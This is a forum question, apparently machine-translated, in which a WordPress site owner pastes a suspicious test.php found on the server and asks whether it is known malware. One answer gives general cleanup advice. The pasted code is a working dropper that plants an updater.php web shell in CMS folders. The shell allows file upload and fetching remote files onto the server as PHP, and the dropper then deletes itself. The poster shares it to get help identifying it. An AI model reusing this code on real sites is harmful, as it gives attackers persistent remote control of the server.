Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
V
V
vangelder2019-07-30 20:23:45
Malware
vangelder, 2019-07-30 20:23:45

Perhaps a new wordpress virus?

Website on wordpress, worth WordFence...

and today I began to swear at the file in the root test.php with the following content:
<?php 
$randStr = str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890');
$rand = substr($randStr,0,6);
$htm='<?php error_reporting(0); $path = __DIR__; if($_GET["login"]=="'.$rand.'"){if(isset($_FILES["uploadedfile"])){ $target_path=basename($_FILES["uploadedfile"]["name"]);if(move_uploaded_file($_FILES["uploadedfile"]["tmp_name"],$target_path)){echo "<font color=\"green\">file uploaded</font><br />";}else{echo "<font color=\"red\">upload fail</font><br />";}} echo "<form enctype=\"multipart/form-data\" method=\"POST\"><input name=\"uploadedfile\" type=\"file\"/><input type=\"submit\" value=\"Upload File\"/></form></td></tr>"; function get($url, $dir){ $ch=curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch,CURLOPT_TIMEOUT,10); $data = curl_exec($ch); if(!$data){ $data = @file_get_contents($url);} file_put_contents($dir, $data);} if($_GET["url"]){ $url = $_GET["url"]; preg_match("/(.*)\/(.*)\.(.*?)$/",$url,$n); if($n[3]=="txt"){ $z="php"; $name=$n[2]; }else{ $z=$n[3]; $name="moban"; } if($_GET["dir"]){ $dir=$_SERVER["DOCUMENT_ROOT"]."/".$_GET["dir"]."/".$name.".".$z; }else{ $dir=$_SERVER["DOCUMENT_ROOT"]."/".$name.".".$z;} get($url,$dir); if(file_exists($dir)){echo "<tr><td><font color=\"green\">download success</font></td></tr>";}else{echo "<tr><td><font color=\"red\">download fail</font></td></tr>";}}elseif($_POST["url"]){ $url = $_POST["url"]; preg_match("/(.*)\/(.*)\.(.*?)$/",$url,$n); if($n[3]=="txt"){ $z="php"; $name=$n[2];}else{$z=$n[3]; $name="moban";} $dir = $_POST["path"]."/".$name.".".$z; get($url,$dir); if(file_exists($dir)){echo "<tr><td><font color=\"green\">download success</font></td></tr>";}else{echo "<tr><td><font color=\"red\">download fail</font></td></tr>";}}echo "<tr><td><form method=\"POST\"><span>Url: </span><input type=text name=\"url\" value=\"\"><input type=\"hidden\" name=\"path\" value=\"$path\"><input type=submit value=\"Download\"></form></td></tr>";} ?>';
$home = $_SERVER['SERVER_NAME'];
$RootDir = $_SERVER['DOCUMENT_ROOT'];
if(is_dir($RootDir . "/wp-admin/user")){
  file_put_contents($RootDir . "/wp-admin/user/updater.php", $htm);
  $url1 = "http://".$home."/wp-admin/user/updater.php?login=".$rand;
  echo '<meta http-equiv="Refresh" content="0; url='.$url1.'">';
}
else if(is_dir($RootDir . "/modules/mod_search")){
  file_put_contents($RootDir . "/modules/mod_search/updater.php", $htm);
  $url2 = "http://".$home."/modules/mod_search/updater.php?login=".$rand;
  echo '<meta http-equiv="Refresh" content="0; url='.$url2.'">';
}
else if(is_dir($RootDir . "/includes/database")){
  file_put_contents($RootDir . "/includes/database/updater.php", $htm);
  $url3 = "http://".$home."/includes/database/updater.php?login=".$rand;
  echo '<meta http-equiv="Refresh" content="0; url='.$url3.'">';
}
else if(is_dir($RootDir . "/manager/controllers")){
  file_put_contents($RootDir . "/manager/controllers/updater.php", $htm);
  $url4 = "http://".$home."/manager/controllers/updater.php?login=".$rand;
  echo '<meta http-equiv="Refresh" content="0; url='.$url4.'">';
}else {
  if(!is_dir($RootDir . "/templates"))
  mkdir($RootDir . "/templates",0777);
  if(!is_dir($RootDir . "/templates/atomic"))
  mkdir($RootDir . "/templates/atomic",0777);
  file_put_contents($RootDir . "/templates/atomic/templates.php", $htm);
  $url5 = "http://".$home."/templates/atomic/templates.php?login=".$rand;
  echo '<meta http-equiv="Refresh" content="0; url='.$url5.'">';
}
unlink("./test.php");

Googled... didn't find anything.... can anyone come across it already?
PS This file is located in almost all hosting folders (on other sites), etc.

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

1 answer(s)
Report
N
Nikolay Pekarsky, 2019-08-01
@Dizer7

well, such a file should not be in the root of the WordPress installation.
look carefully, perhaps on the site, among the folders, new folders have appeared?
You can also check the site using other services .
Often such surprises appear because of this:
1) leaky hosting - viruses from one site are transferred to others within the server.
2) plugins taken from the network
are used 3) templates taken from the network are used
How to check your template for viruses

Similar questions
G
Gre4ka942019-09-01 00:32:20
Explain how advertising viruses work technically? 2Reply
L
lane-x2021-03-31 11:07:57
Can a system installed on a flash drive infect the main machine? 1Reply
R
rain1392021-04-05 12:52:43
On vps linux debian sends my smpt access to the left email, how can I disable it? 2Reply
S
semki0962017-04-27 13:27:21
Do I need to protect against cross-site request forgery if my form is submitted by Ajax? 1Reply
M
MaximDoshi2015-05-15 19:12:14
When the computer boots up, I hear the sound of a creaking door, what is it? 7Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question